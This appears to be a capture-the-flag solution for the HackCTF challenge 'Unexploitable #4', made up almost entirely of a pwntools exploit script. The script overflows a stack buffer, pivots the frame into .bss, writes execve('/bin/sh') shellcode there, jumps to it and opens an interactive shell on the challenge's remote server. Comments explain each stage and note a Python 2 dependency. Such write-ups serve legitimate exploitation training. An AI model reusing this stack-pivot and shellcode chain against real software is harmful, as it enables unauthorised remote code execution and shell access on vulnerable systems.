[HackCTF]Unexploitable #4

  • stack pivot

exploit.py

from pwn import *

# Target setup. The local process() line is left commented out as the author
# had it; the run below talks to the remote challenge service.
context.log_level = 'debug'
context.arch = 'amd64'
e = ELF('./Unexploitable_4')
# p = process('./Unexploitable_4')
p = remote('ctf.j0n9hyun.xyz',3039)
# Hard-coded addresses: a scratch area in .bss used as a fake stack frame, a
# leave;ret gadget and the fgets call site that is re-entered to read each
# stage.  Relying on fixed addresses only works for a non-PIE binary --
# NOTE(review): protections (PIE/NX/canary) are not shown on this page, confirm
# with checksec.
bss = 0x601500
leave_ret = 0x00000000004006F8   # NOTE: assigned but never used below
fgets = 0x00000000004006DB

# Gives time to attach a debugger before any input is sent.
pause()

# execve("/bin/sh", NULL, NULL) shellcode that is written into .bss and later
# executed from there, which requires .bss to be executable (NX off).  The
# 0x10 byte at the top of the 64-bit constant is overwritten with al (0) via
# mov [rsp+7],al -- presumably to keep a NUL out of the encoded immediate;
# TODO confirm.  The asm text itself is passed to pwntools unchanged.
s = asm('''
xor rax,rax;
xor rdx,rdx;
xor rsi,rsi;
mov rbx,0x1068732f6e69622f;
push rbx;
mov [rsp+7],al;
mov rdi,rsp;
mov al,0x3b;
syscall;
''')

# Stage 1 (stack pivot): overflow the 0x10-byte buffer, replace the saved rbp
# with the .bss scratch address and return into the fgets call, so the next
# read is performed relative to the fake frame.  A stack canary would have
# caught this overwrite; its absence is assumed from the script, not shown.
pay = 'A'*0x10
pay += p64(bss) # sfp
pay += p64(fgets) # ret
p.sendline(pay)

# Stage 2: same layout, now landing in .bss.  The fake saved rbp is moved
# further up the scratch area, fgets is used as the return address once more,
# and the first 8 bytes of the shellcode are placed right after the frame.
pay = 'A'*0x10
pay += p64(bss+40)
pay += p64(fgets)
pay += s[:8]
p.sendline(pay)

# Stage 3: the remaining shellcode bytes plus a one-byte nop pad, followed by
# the address of the shellcode start (0x601510 == bss+0x10) in the slot that
# the final leave;ret pops as the return address -- this slot position is
# inferred from the offsets above, verify in a debugger.
pay = s[8:] + '\x90'
pay += p64(0x601510)
p.sendline(pay)

# NOTE(review): the payloads concatenate str and bytes ('A'*0x10 + p64(...),
# s[8:] + '\x90'); that is Python 2 behaviour and raises TypeError under
# Python 3 pwntools.
p.interactive()